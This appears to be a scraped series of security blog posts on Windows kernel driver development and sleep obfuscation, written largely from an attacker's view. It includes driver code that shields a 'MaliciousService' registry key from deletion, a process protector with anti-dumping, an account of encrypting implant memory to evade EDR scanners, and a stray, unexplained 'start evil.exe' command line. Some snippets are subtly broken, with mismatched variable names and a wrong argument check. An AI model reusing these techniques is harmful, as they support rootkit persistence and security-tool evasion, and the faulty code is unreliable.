An example is a rootkit that saves its configuration in the registry and then hides it using this callback. To give another practical example, we will create now another driver - a driver that can protect registry keys from deletion.

Registry Protector

First, let’s start with the DriverEntry:

#define DRIVER_PREFIX "MyDriver: "
#define DRIVER_DEVICE_NAME L"\\Device\\MyDriver"
#define DRIVER_SYMBOLIC_LINK L"\\??\\MyDriver"
#define REG_CALLBACK_ALTITUDE L"31102.0003"

PVOID g_RegCookie;

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    NTSTATUS status = STATUS_SUCCESS;

    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(DRIVER_DEVICE_NAME);
    UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);
    UNICODE_STRING regAltitude = RTL_CONSTANT_STRING(REG_CALLBACK_ALTITUDE);

    // Creating device and symbolic link.
    status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to create device: (0x%08X)\n", status));
        return status;
    }
    
    status = IoCreateSymbolicLink(&symbolicLink, &deviceName);
    
    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to create symbolic link: (0x%08X)\n", status));
        IoDeleteDevice(DeviceObject);
        return status;
    }

    // Registering the registry callback.
    status = CmRegisterCallbackEx(RegNotify, &regAltitude, DriverObject, nullptr, &g_RegContext, nullptr);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to register registry callback: (0x%08X)\n", status));
        IoDeleteSymbolicLink(&symbolicLink);
        IoDeleteDevice(DeviceObject);
        return status;
    }

    DriverObject->DriverUnload = MyUnload;
    return status;
}

We added to the standard DriverEntry initializations (Creating DeviceObject and symbolic link) CmRegisterCallbackEx to register our RegNotify callback. Note that we saved the g_RegContext as a global variable, as it will be used soon in the MyUnload function to unregister the driver when the DriverUnload is called.

void MyUnload(PDRIVER_OBJECT DriverObject) {
    KdPrint((DRIVER_PREFIX "Unloading...\n"));
    NTSTATUS status = CmUnRegisterCallback(g_RegContext);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to unregister registry callbacks: (0x%08X)\n", status));
    }

    UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);
    IoDeleteSymbolicLink(&symbolicLink);
    IoDeleteDevice(DriverObject->DeviceObject);
}

In MyUnload, we didn’t just unload the driver but also made sure to unregister our callback using the g_RegContext from before.

NTSTATUS RegNotify(PVOID context, PVOID Argument1, PVOID Argument2) {
    PCUNICODE_STRING regPath;
    UNREFERENCED_PARAMETER(context);
    NTSTATUS status = STATUS_SUCCESS;
    
    switch ((REG_NOTIFY_CLASS)(ULONG_PTR)Argument1) {
        case RegNtPreDeleteKey: {
            REG_DELETE_KEY_INFORMATION* info = static_cast<REG_DELETE_KEY_INFORMATION*>(Argument2);
            
            // To avoid BSOD.
            if (!info->Object)
                break;
            
            status = CmCallbackGetKeyObjectIDEx(&g_RegContext, info->Object, nullptr, &regPath, 0);
            
            if (!NT_SUCCESS(status))
                break;
            
            if (!regPath->Buffer || regPath->Length < 50)
                break;

            if (_wcsnicmp(LR"(SYSTEM\CurrentControlSet\Services\MaliciousService)", regPath->Buffer, 50) == 0) {
                KdPrint((DRIVER_PREFIX "Protected the malicious service!\n"));
                status = STATUS_ACCESS_DENIED;
            }
            
            CmCallbackReleaseKeyObjectIDEx(regPath);
        }
        break;
    }
    
    return status;
}

Let’s break down what we’ve done here. First, we checked what is the type of operation and chose to respond only for RegNtPreDeleteKey. When we know that Argument2 contains information of type REG_DELETE_KEY_INFORMATION we can cast to it.

After the cast, we can use the Object parameter to access the registry key itself to get the key’s path. To do that, we can use CmCallbackGetKeyObjectIDEx:

NTSTATUS CmCallbackGetKeyObjectIDEx(
  [in]            PLARGE_INTEGER   Cookie,
  [in]            PVOID            Object,
  [out, optional] PULONG_PTR       ObjectID,
  [out, optional] PCUNICODE_STRING *ObjectName,
  [in]            ULONG            Flags
);

Cookie is our global g_RegContext variable. Object is the registry key object. ObjectID is a unique registry identifier for our needs it can be null. *ObjectName is the output registry key path, make sure it is in the kernel format. Flags must be 0.

When you got the ObjectName it is just a matter of comparing it and the key that you want to protect and if it matches you can change the status to STATUS_ACCESS_DENIED to block the operation.

You can see a full implementation of the different registry operations handling in Nidhogg’s Registry Utils.

Conclusion

In this blog, we learned about the different types of kernel callbacks and created our registry protector driver.

In the next blog, we will learn two common hooking methods (IRP Hooking and SSDT Hooking) and two different injection techniques from the kernel to the user mode for both shellcode and DLL (APC and CreateThread) with code snippets and examples from Nidhogg.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

timeout /t 31 && start evil.exe

6 November 2022 at 00:00

star fork follow

Prologue

Cronos is a new sleep obfuscation technique co-authored by @idov31 and @yxel.

It is based on 5pider’s Ekko and like it, it encrypts the process image with RC4 encryption and evades memory scanners by also changing memory regions permissions from RWX to RW back and forth.

In this blog post, we will cover Cronos specifically and sleep obfuscation techniques in general and explain why we need them and the common ground of any sleep obfuscation technique.

As always, the full code is available on GitHub and for any questions feel free to reach out on Twitter.

Sleep Obfuscation In General

To understand why sleep obfuscations are a need, we need to understand what problem they attempt to solve. Detection capabilities evolves over the years, we can see that more and more companies going from using AV to EDRs as they provide more advanced detection capabilities and attempt to find the hardest attackers to find. Besides that, also investigators have better tools like pe-sieve that finds injected DLLs, hollowed processes and shellcodes and that is a major problem for any attacker that attempts to hide their malware.

To solve this issue, people came up with sleep obfuscation techniques and all of them have a basic idea: As long as the current piece of malware (whether it is DLL, EXE or shellcode) isn’t doing any important “work” (for example, when an agent don’t have any task from the C2 or backdoor that just checks in once in a while) it should be encrypted, when people start realizing that they came up with a technique that will encrypt the process image and decrypt it when it needs to be activated.

One of the very first techniques I got to know is Gargoyle which is an amazing technique for marking a process as non-executable and using the ROP chain to make it executable again. This worked great until scanners began to adapt and began looking also for non-executable memory regions, but in this game of cops and thieves, the attackers adapted again and started using a single byte XOR to encrypt the malicious part or the whole image an example for it is SleepyCrypt. SleepyCrypt not only adds encryption but also supports x64 binaries (the original Gargoyle supports only x86 but Waldo-IRC created an x64 version of Gargoyle) but, you guessed it, memory scanners found a solution to that as well by doing single XOR brute force on memory regions.

Now that we have the background and understand WHY sleep obfuscations exist let’s understand what has changed and what sleep obfuscation techniques we have nowadays.

Modern Sleep Obfuscations

Today (speaking in 2022) we have memory scanners that can brute force single-byte XOR encryption and detect malicious programs even when they do not have any executable rights, what can be done next?

The answer starts to become clearer in Foliage, which uses not only heavier obfuscation than single-byte XOR but also a neat trick to trigger the ROP chain to change the memory regions’ permission using NtContinue and context.

Later on, Ekko came out and added 2 important features: One of them is to RC4 encrypt the process image using an undocumented function SystemFunction032, and the other one is to address and fix the soft spot of every sleep technique so far: Stabilize the ROP using a small and very meaningful change to the RSP register.

To conclude the modern sleep obfuscation section we will also talk about DeathSleep a technique that kills the current thread after saving its CPU state and stack and then restores them. DeathSleep also helped a lot during the creation of Cronos.

Now, it is understandable where we are heading with this and combine all the knowledge we have accumulated so far to create Cronos.

Cronos

The main logic of Cronos is pretty simple:

  1. Changing the image’s protection to RW.

  2. Encrypt the image.

  3. Decrypt the image.

  4. Add execution privileges to the image.

To achieve this we need to do several things like encrypting somehow the image with a function, choosing which kind of timer to use and most importantly finding a way to execute code when the image is decrypted.

Finding an encryption function was easy, choosing SystemFunction032 was an obvious choice since it is well used (also in Ekko) and also documented by Benjamin Delpy in his article and many other places.

One may ask “Why to use a function that can be used as a strong IoC when you can do custom or XOR encryption?” the honest answer is that it will be much easier to use it in the ROP later on (spoiler alert) than implementing strong and good encryption.

Now, that we have an encryption function we need to have timers that can execute an APC function of our choosing. For that, I chose waitable timers because they are well-documented, easy and stable to use and easy to trigger - all that needs to be done is to call any alertable sleep function (e.g. SleepEx).

All we have left to do is to find a way to execute an APC that will trigger the sleeping function, the problem is that the code has to run regardless of the image’s state (whether has executable rights, encrypted, etc.) and the obvious solution is to use an ROP chain that will execute the sleep to trigger the APC.

For the final stage, we used the NtContinue trick from Foliage to execute the different stages of sleep obfuscation (RW -> Encrypt -> Decrypt -> RWX).

Conclusion

This was a fun project to make, and we were able to make it thanks to the amazing projects mentioned here every single one of them created another piece to get us where we are here.

I hope that you enjoyed the blog and would love to hear what you think about it!

Lord Of The Ring0 - Part 3 | Sailing to the land of the user (and debugging the ship)

30 October 2022 at 00:00

star fork follow

Prologue

In the last blog post, we understood what it is a callback routine, how to get basic information from user mode and for the finale created a driver that can block access to a certain process. In this blog, we will dive into two of the most important things there are when it comes to driver development: How to debug correctly, how to create good user-mode communication and what lessons I learned during the development of Nidhogg so far.

This time, there will be no hands-on code writing but something more important - how to solve and understand the problems that pop up when you develop kernel drivers.

Debugging

The way I see it, there are 3 approaches when it comes to debugging a kernel: The good, the great and the hacky (of course you can combine them all and any of them). I’ll start by explaining every one of them, the benefits and the downsides.

  • The good: This method is for anyone because it doesn’t require many resources and is very effective. All you need to do is to set the VM where you test your driver to produce a crash dump (you can leave the crash dump option to automatic) and make sure that in the settings the disable automatic deletion of memory dumps when the disk is low is checked or you can find yourself very confused to not find the crash dump when it should be generated. Then, all you have to do is to drag the crash dump back to your computer and analyze it. The con of this method is that sometimes you can see corrupted data and values that you don’t know how they got there, but most of the time you will get a lot of information that can be very helpful to trace back the source of the problem.

  • The great: This method is for those who have a good computer setup because not everyone can run it smoothly, to debug your VM I recommend following these instructions. Then, all you have to do is put breakpoints in the right spots and do the debugging we all love to hate but gives the best results as you can track everything and see everything in real-time. The con of this method is that it requires a lot of resources from the computer and not everyone (me included) has enough resources to open Visual Studio, run a VM and remote debug it with WinDBG.

  • The hacky: I highly recommend not using this method alone. Like in every type of program you can print debugging messages with KdPrint and set up the VM to enable debugging messages and fire up DbgView to see your messages. Make sure that if you are printing a string value lower the IRQL like so:

KIRQL prevIrql = KeGetCurrentIrql();
KeLowerIrql(PASSIVE_LEVEL);
KdPrint(("Print your string %ws.\n", myString));
KeRaiseIrql(prevIrql, &prevIrql);

Because it lets you see what the values of the current variables are it is very useful, just not if you did something that causes the machine to crash, that’s why I recommend combining it with either the crash dump option or the debugging option.

I won’t do here a guide on how to use WinDBG because there are many great guides out there but I will add a word about it. The top commands that help me a lot during the process of understanding what’s wrong are:

  • !analyze -v: It lets WinDBG load the symbols, what is the error code and most importantly the line in your source code that led to that BSOD.

  • lm: This command shows you all the loaded modules at the time of the crash and allows you to iterate them, their functions, etc.

  • uf /D <address>: This command shows you the disassembly of a specific address, so you can examine it.

After we now know the basics of how to debug a driver, let’s dive into the main event: how to properly exchange data with the user mode.

Talking with the user-mode 102

Last time we understood the different methods to send and get data from user mode, the basic usage of IOCTLs and what IRPs are. But what happens when we want to send a list of different variables? What happens if we want to send a file name, process name or something that isn’t just a number?

DISCLAIMER: As I said before, in this series I’ll be using the IOCTL method, so we will address the problem using this method.

To properly send data we can use the handly and trusty struct. What you need to do is to define a data structure in both your user application and the kernel application for what you are planning to send, for example:

struct MyItem {
    int type;
    int price;
    WCHAR* ItemsName;
}

And send it through the DeviceIoControl:

DeviceIoControl(hFile, IOCTL_DEMO,
        &myItem, sizeof(myItem),
        &myItem, sizeof(myItem), &returned, nullptr)

But all of this we knew before, so what is new? As you noticed, I sent myItem twice and the reason is in the definition of DeviceIoControl:

BOOL DeviceIoControl(
  [in]                HANDLE       hDevice,
  [in]                DWORD        dwIoControlCode,
  [in, optional]      LPVOID       lpInBuffer,
  [in]                DWORD        nInBufferSize,
  [out, optional]     LPVOID       lpOutBuffer,
  [in]                DWORD        nOutBufferSize,
  [out, optional]     LPDWORD      lpBytesReturned,
  [in, out, optional] LPOVERLAPPED lpOverlapped
);

We can define the IOCTL in a way that will allow the driver to both receive data and send data, all we have to do is to define our IOCTL with the method type METHOD_BUFFERED like so:

#define IOCTL_DEMO CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

And now, SystemBuffer is accessible for both writing and reading.

A quick reminder: SystemBuffer is the way we can access the user data, and is accessible to us through the IRP like so:

Irp->AssociatedIrp.SystemBuffer;

Now that we can access it there several questions remain: How can I write data to it without causing BSOD? And how can I verify that I get the type that I want? What if I want to send or receive a list of items and not just one?

The second question is easy to answer and is already shown up in the previous blog post:

auto size = stack->Parameters.DeviceIoControl.InputBufferLength;

if (size % sizeof(MyItem) != 0) {
    status = STATUS_INVALID_BUFFER_SIZE;
    break;
}

This is a simple yet effective test but isn’t enough, that is why we also need to verify every value we want to use:

...
auto data = (MyItem*)Irp->AssociatedIrp.SystemBuffer;

if (data->type < 0 || !data->ItemsName || data->price < 0) {
    status = STATUS_INVALID_PARAMETER;
    break;
}
...

This is just an example of checks that need to be done when accessing user mode data, and everything that comes or returns to the user should be taken care of with extreme caution.

Writing data back to the user is fairly easy like in user mode, the hard part comes when you want to return a list of items but don’t want to create an entirely new structure just for it. Microsoft themselves solved this in a pretty strange-looking yet effective way, you can see it in several WinAPIs for example when iterating a process or modules and there are two approaches:

The first one will be sending each item separately and when the list ends send null. The second method is sending first the number of items you are going to send and then sending them one by one. I prefer the second method (and you can also see it implemented in Nidhogg) but you can do whatever works for you.

Conclusion

This time, it was a relatively short blog post but very important for anyone that wants to write a kernel mode driver correctly and learn to solve their problems.

In this blog, we learned how to debug a kernel driver and how to properly exchange data between our kernel driver to the user mode. In the next blog, we will understand the power of callbacks and learn about the different types that are available to us.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Lord Of The Ring0 - Part 2 | A tale of routines, IOCTLs and IRPs

4 August 2022 at 00:00

star fork follow

Prologue

In the last blog post, we had an introduction to kernel development and what are the difficulties when trying to load a driver and how to bypass it. In this blog, I will write more about callbacks, how to start writing a rootkit and the difficulties I encountered during my development of Nidhogg.

As I promised to bring both defensive and offensive points of view, we will create a driver that can be used for both blue and red teams - A process protector driver.

P.S: The name Nidhogg was chosen after the nordic dragon that lies underneath Yggdrasil :).

Talking with the user mode 101

A driver should be (most of the time) controllable from the user mode by some process, an example would be Sysmon - When you change the configuration, turn it off or on it tells its kernel part to stop performing certain operations, works by an updated policy or just shut down it when you decide to unload Sysmon. As kernel drivers, we have two ways to communicate with the user mode: Via DIRECT_IO or IOCTLs.The advantage of DIRECT_IO is that it is more simple to use and you have more control and the advantage of using IOCTLs is that it is safer and developer friendly. In this blog series, we will use the IOCTLs approach.

To understand what is an IOCTL better, let’s look at an IOCTL structure:

#define MY_IOCTL CTL_CODE(DeviceType, FunctionNumber, Method, Access)

The device type indicates what is the type of the device (different types of hardware and software drivers), it doesn’t matter much for software drivers will be the number but the convention is to use 0x8000 for 3rd software drivers like ours.

The second parameter indicates the function “index” in our driver, it could be any number but the convention suggests starting from 0x800.

The method parameter indicates how the input and output should be handled by the driver, it could be either METHOD_BUFFERED or METHOD_IN_DIRECT or METHOD_OUT_DIRECT or METHOD_NEITHER.

The last parameter indicates if the driver accepts the operation (FILE_WRITE_ACCESS) or the driver operates (FILE_READ_ACCESS) or the driver accepts and performs the operation (FILE_ANY_ACCESS).

To use IOCTLs, on the driver’s initialization you will need to set a function that will parse an IRP and knows how to handle the IOCTLs, such a function is defined as followed:

NTSTATUS MyDeviceControl(
    [in] PDEVICE_OBJECT DeviceObject, 
    [in] PIRP           Irp
);

IRP in a nutshell is a structure that represents an I/O request packet. You can read more about it in MSDN.

When communicating with the user mode we need to define two more things: The device object and the symbolic link. The device object is the object that handles the I/O requests and allows us as a user-mode program to communicate with the kernel driver. The symbolic link creates a linkage in the GLOBAL?? directory so the DeviceObject will be accessible from the user mode and usually looks like \??\DriverName.

Callback Routines

To understand how to use callback routines let’s understand WHAT are they. The callback routine is a feature that allows kernel drivers to register for certain events, an example would be process operation (such as: getting a handle to process) and affect their result. When a kernel driver registers for an operation, it notifies “I’m interested in the certain event and would like to be notified whenever this event occurs” and then for each time this event occurs the driver is get notified and a function is executed.

One of the most notable ways to register for an operation is with the ObRegisterCallbacks function:

NTSTATUS ObRegisterCallbacks(
  [in]  POB_CALLBACK_REGISTRATION CallbackRegistration,
  [out] PVOID                     *RegistrationHandle
);

typedef struct _OB_CALLBACK_REGISTRATION {
  USHORT                    Version;
  USHORT                    OperationRegistrationCount;
  UNICODE_STRING            Altitude;
  PVOID                     RegistrationContext;
  OB_OPERATION_REGISTRATION *OperationRegistration;
} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;

typedef struct _OB_OPERATION_REGISTRATION {
  POBJECT_TYPE                *ObjectType;
  OB_OPERATION                Operations;
  POB_PRE_OPERATION_CALLBACK  PreOperation;
  POB_POST_OPERATION_CALLBACK PostOperation;
} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;

Using this callback we can register for two types of OperationRegistration: ObjectPreCallback and ObjectPostCallback. The pre-callback happens before the operation is executed and the post-operation happens after the operation is executed and before the user gets back the output.

Using ObRegisterCallback you can register for this ObjectTypes of operations (You can see the full list defined in WDM.h):

  • PsProcessType
  • PsThreadType
  • ExDesktopObjectType
  • IoFileObjectType
  • CmKeyObjectType
  • ExEventObjectType
  • SeTokenObjectType

To use this function, you will need to create a function with a unique signature as follows (depending on your needs and if you are using PreOperation or PostOperation):

OB_PREOP_CALLBACK_STATUS PobPreOperationCallback(
  [in] PVOID RegistrationContext,
  [in] POB_PRE_OPERATION_INFORMATION OperationInformation
)

void PobPostOperationCallback(
  [in] PVOID RegistrationContext,
  [in] POB_POST_OPERATION_INFORMATION OperationInformation
)

Now that we understand better what callbacks are we can write our first driver - A kernel driver that protects a process.

Let’s build - Process Protector

To build a process protector we need to first understand how will it work. What we want is basic protection against any process that attempts to kill our process, the protected process could be our malicious program or our precious Sysmon agent. To perform the killing of a process the process that performs the killing will need a handle with the PROCESS_TERMINATE permissions, and before we said that we could register for certain events like a request for the handle to process. So as a driver, you could remove permissions from a handle and return a handle without specific permission which is in our case the PROCESS_TERMINATE permission.

To start with the development we will need a DriverEntry function:

#include <ntddk.h>

// Definitions
#define IOCTL_PROTECT_PID    CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define PROCESS_TERMINATE 1

// Prototypes
DRIVER_UNLOAD ProtectorUnload;
DRIVER_DISPATCH ProtectorCreateClose, ProtectorDeviceControl;

OB_PREOP_CALLBACK_STATUS PreOpenProcessOperation(PVOID RegistrationContext, POB_PRE_OPERATION_INFORMATION Info);

// Globals
PVOID regHandle;
ULONG protectedPid;

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
    NTSTATUS status = STATUS_SUCCESS;
    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(L"\\Device\\Protector");
    UNICODE_STRING symName = RTL_CONSTANT_STRING(L"\\??\\Protector");
    PDEVICE_OBJECT DeviceObject = nullptr;

    OB_OPERATION_REGISTRATION operations[] = {
        {
            PsProcessType,
            OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE,
            PreOpenProcessOperation, nullptr
        }
    };

    OB_CALLBACK_REGISTRATION reg = {
        OB_FLT_REGISTRATION_VERSION,
        1,
        RTL_CONSTANT_STRING(L"12345.6879"),
        nullptr,
        operations
    };

    ...

Before we continue let’s explain what’s going on, we defined a deviceName with our driver name (Protector) and a symbolic link with the same name (the symName parameter). We also defined an array of operations that we want to register for - In our case it is just the PsProcessType for each handle creation or handle duplication.

We used this array to finish the registration definition - the number 1 stands for only 1 operation to be registered, and the 12345.6879 defines the altitude. An altitude is a unique double number (but using a UNICODE_STRING to represent it) that is used to identify registration and relate it to a certain driver.

As you probably noticed, the DriverEntry is “missing” the RegistryPath parameter, to not write UNREFERENCED_PARAMETER(RegistryPath) we can just not write it and it will be unreferenced.

Now, let’s do the actual registration and finish the DriverEntry function:

...

    status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to create device object (status=%08X)\n", status));
        return status;
    }

    status = IoCreateSymbolicLink(&symName, &deviceName);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to create symbolic link (status=%08X)\n", status));
        IoDeleteDevice(DeviceObject);
        return status;
    }

    status = ObRegisterCallbacks(&reg, &regHandle);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "failed to register the callback (status=%08X)\n", status));
        IoDeleteSymbolicLink(&symName);
        IoDeleteDevice(DeviceObject);
        return status;
    }

    DriverObject->DriverUnload = ProtectorUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = ProtectorCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ProtectorDeviceControl;

    KdPrint(("DriverEntry completed successfully\n"));
    return status;
}

Using the functions IoCreateDevice and IoCreateSymbolicLink we created a device object and a symbolic link. After we know our driver can be reached from the user mode we registered our callback with ObRegisterCallbacks and defined important major functions such as ProtectorCreateClose (will explain it soon) and ProtectorDeviceControl to handle the IOCTL.

The ProtectorUnload function is very simple and just does the cleanup like we did if the status wasn’t successful: The next thing on the list is to implement the ProtectorCreateClose function. The function is responsible on complete the IRP, since in this driver we don’t have multiple device objects and we are not doing much with it we can handle the completion of the relevant IRP in our DeviceControl function and for any other IRP just close it always with a successful status.

NTSTATUS ProtectorCreateClose(PDEVICE_OBJECT, PIRP Irp) {
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

The device control is also fairly simple as we have only one IOCTL to handle:

NTSTATUS ProtectorDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
    NTSTATUS status = STATUS_SUCCESS;
    auto stack = IoGetCurrentIrpStackLocation(Irp);

    switch (stack->Parameters.DeviceIoControl.IoControlCode) {
        case IOCTL_PROTECT_PID:
        {
            auto size = stack->Parameters.DeviceIoControl.InputBufferLength;

            if (size % sizeof(ULONG) != 0) {
                status = STATUS_INVALID_BUFFER_SIZE;
                break;
            }

            auto data = (ULONG*)Irp->AssociatedIrp.SystemBuffer;
            protectedPid = *data;
            break;
        }
        default:
            status = STATUS_INVALID_DEVICE_REQUEST;
            break;
    }

    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}

As you noticed, to see the IOCTL, get the input and for more operations in the future, we need to use the IRP’s stack. I won’t go over its entire structure but you can view it in MSDN. To make it clearer, when using the METHOD_BUFFERED option the input and output buffers are delivered via the SystemBuffer that is located within the IRP’s stack.

After we got the stack and verified the IOCTL, we need to check our input because wrong input handling can cause a BSOD. When the input verification is completed all we have to do is just change the protectedPid to the wanted PID.

With the DeviceControl and the CreateClose functions, we can create the last function in the kernel driver - The PreOpenProcessOperation.

OB_PREOP_CALLBACK_STATUS PreOpenProcessOperation(PVOID, POB_PRE_OPERATION_INFORMATION Info) {
    if (Info->KernelHandle)
        return OB_PREOP_SUCCESS;
    
    auto process = (PEPROCESS)Info->Object;
    auto pid = HandleToULong(PsGetProcessId(process));
    
    // Protecting our pid and removing PROCESS_TERMINATE.
    if (pid == protectedPid) {
        Info->Parameters->CreateHandleInformation.DesiredAccess &= ~PROCESS_TERMINATE;
    }
    
    return OB_PREOP_SUCCESS;
}

Very simple isn’t it? Just logic and the opposite value of the PROCESS_TERMINATE and we are done.

Now, we have left only one thing to make sure and it is to allow our driver to register for operation registration, it can be done within the project settings in Visual Studio in the linker command line and just add /integritycheck switch.

After we finished with the kernel driver part let’s go to the user-mode part.

Protector’s User mode Part

The user-mode part is even simple as we just need to create a handle for the device object and send the wanted PID.

#include <iostream>
#include <Windows.h>

int main(int argc, const char* argv[]) {
    DWORD bytes;

    if (argc != 1) {
        std::cout << "Usage: " << argv[0] << " <pid>" << std::endl;
        return 1;
    }

    DWORD pid = atoi(argv[1]);
    HANDLE device = CreateFile(L"\\\\.\\Protector", GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr);

    if (device == INVALID_HANDLE_VALUE) {
        std::cout << "Failed to open device" << std::endl;
        return 1;
    }

    success = DeviceIoControl(device, IOCTL_PROTECT_PID, &pid, sizeof(pid), nullptr, 0, &bytes, nullptr);
    CloseHandle(device);

    if (!success) {
        std::cout << "Failed in DeviceIoControl: " << GetLastError() << std::endl;
        return 1;
    }
    
    std::cout << "Protected process with pid: " << pid << std::endl;
    return 0;
}

Congratulations on writing your very first functional kernel driver!

Bonus - Anti-dumping

To prevent a process from being dumped all we have to do is just remove more permissions such as PROCESS_VM_READ, PROCESS_DUP_HANDLE and PROCESS_VM_OPERATION. An example can be found in Nidhogg’s ProcessUtils file.

Conclusion

In this blog, we got a better understanding of how to write a driver, how to communicate it and how to use callbacks. In the next blog, we will dive more into this world and learn more new things about kernel development.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Lord Of The Ring0 - Part 1 | Introduction

14 July 2022 at 00:00

star fork follow

Introduction

This blog post series isn’t a thing I normally do, this will be more like a journey that I document during the development of my project Nidhogg. In this series of blogs (which I don’t know how long will it be), I’ll write about difficulties I encountered while developing Nidhogg and tips & tricks for everyone who wants to start creating a stable kernel mode driver in 2022.

This series will be about WDM type of kernel drivers, developed in VS2019. To install it, you can follow the guide in MSDN. I highly recommend that you test EVERYTHING in a virtual machine to avoid crashing your computer.

Without further delays - Let’s start!

Kernel Drivers In 2022

The first question you might ask yourself is: How can kernel driver help me in 2022? There are a lot of 1337 things that I can do for the user mode without the pain of developing and consistently crashing my computer.

From a red team perspective, I think that there are several things that a kernel driver can give that user mode can’t.

  • Being an efficient backdoor with extremely evasive persistency.
  • Do highly privileged operations without the dependency of LPE exploit or privileged users.
  • Easily evade AV / EDR hooks.
  • Be able to hide your implant without suspicious user-mode hooks.

From a blue team perspective, you can log more events and block suspicious operations with methods you won’t be able to do in the user mode.

  • Create a driver to monitor and log specific events (like Sysmon) specially crafted to meet your organization’s needs.
  • Create kernel mode hooks to find advanced rootkits and malware.
  • Provide kernel mode protection to your blue agents (such as OSQuery, Wazuh, etc.).

NOTE: This blog series will focus more on the red team part but I’ll also add the blue team perspective as one affects the other.

Basic driver structure

Like any good programmer, we will start with creating a basic driver to print famous words with an explanation of the basics.

#include <ntddk.h>

extern "C"
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = MyUnload;
    KdPrint(("Hello World!\n"));
    return STATUS_SUCCESS;
}

void MyUnload(PDRIVER_OBJECT DriverObject) {
    UNREFERENCED_PARAMETER(DriverObject);
    KdPrint(("Goodbye World!\n"));
}

This simple driver will print “Hello World!” and “Goodbye World!” when it’s loaded and unloaded. Since the parameter RegistryPath is not used, we can use UNREFERENCED_PARAMETER to optimize the variable.

Every driver needs to implement at least two of the functions mentioned above.

The DriverEntry is the first function that is called when the driver is loaded and it is very much like the main function for user-mode programs, except it gets two parameters:

  • DriverObject: A pointer to the driver object.
  • RegistryPath: A pointer to a UNICODE_STRING structure that contains the path to the driver’s registry key.

The DriverObject is an important object that will serve us a lot in the future, its definition is:

typedef struct _DRIVER_OBJECT {
  CSHORT             Type;
  CSHORT             Size;
  PDEVICE_OBJECT     DeviceObject;
  ULONG              Flags;
  PVOID              DriverStart;
  ULONG              DriverSize;
  PVOID              DriverSection;
  PDRIVER_EXTENSION  DriverExtension;
  UNICODE_STRING     DriverName;
  PUNICODE_STRING    HardwareDatabase;
  PFAST_IO_DISPATCH  FastIoDispatch;
  PDRIVER_INITIALIZE DriverInit;
  PDRIVER_STARTIO    DriverStartIo;
  PDRIVER_UNLOAD     DriverUnload;
  PDRIVER_DISPATCH   MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];
} DRIVER_OBJECT, *PDRIVER_OBJECT;

But I’d like to focus on the MajorFunction: This is an array of important functions that the driver can implement for IO management in different ways (direct or with IOCTLs), handling IRPs and more.

We will use it for the next part of the series but for now, keep it in mind. (A little tip: Whenever you encounter a driver and you want to know what it is doing make sure to check out the functions inside the MajorFunction array).

To finish the most basic initialization you will need to do one more thing - define the DriverUnload function. This function will be responsible to stop callbacks and free any memory that was allocated.

When you finish your driver initialization you need to return an NT_STATUS code, this code will be used to determine if the driver will be loaded or not.

Testing a driver

If you tried to copy & paste and run the code above, you might have noticed that it’s not working.

By default, Windows does not allow loading self-signed drivers, and surely not unsigned drivers, this was created to make sure that a user won’t load a malicious driver and by that give an attacker even more persistence and privileges on the attacked machine.

Luckily, there is a way to bypass this restriction for testing purposes, to do this run the following command from an elevated cmd:

bcdedit /set testsigning on

After that restart, your computer and you should be able to load the driver.

To test it out, you can use Dbgview to see the output (don’t forget to compile to debug to see the KdPrint’s output). To load the driver, you can use the following command:

sc create DriverName type= kernel binPath= C:\Path\To\Driver.sys
sc start DriverName 

And to unload it:

sc stop DriverName

You might ask yourself now, how an attacker can deploy a driver? This can be done in several ways:

  • The attacker has found/generated a certificate (the expiration date doesn’t matter).
  • The attacker has allowed test signing (just like we did now).
